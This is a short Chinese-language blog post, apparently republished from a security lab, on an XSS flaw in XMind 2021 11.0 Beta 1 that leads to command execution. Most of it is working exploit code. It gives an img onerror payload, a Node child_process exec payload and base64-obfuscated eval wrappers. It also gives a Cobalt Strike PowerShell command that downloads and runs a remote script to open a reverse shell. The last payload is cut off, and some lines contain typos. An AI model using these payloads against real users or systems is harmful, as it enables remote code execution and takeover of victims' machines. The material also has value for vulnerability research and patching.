XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

华盟原创文章投稿奖励计划

XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

漏洞利用方式:

选择事件型XSS需要附带onerror事件,比如img、audio等。

弹窗代码:

<img src=x oneror=alert(1)>

XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

构造命令执行payload

 

require('child_process').exec('ipconfig/all',(error, stdout, stderr)=>{
   alert(`stdout: ${stdout}`);
  });

 

最终利用代码:

 

<img src=# onerror='eval(newBuffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>
www.idc126.com

反弹shell命令

CS生成powershell脚本

 

powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://127.0.0.1/test/'))"
 
require('child_process').exec('powershell.exe-nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring(\'http://127.0.0.1/test\'))"',(error,stdout, stderr)=>{
   alert(`stdout: ${stdout}`);
  });
 
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==
 
<img src=# onerror='eval(newBuffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXh

 

XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

本文来源Khan安全攻防实验室,经授权后由congtou发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论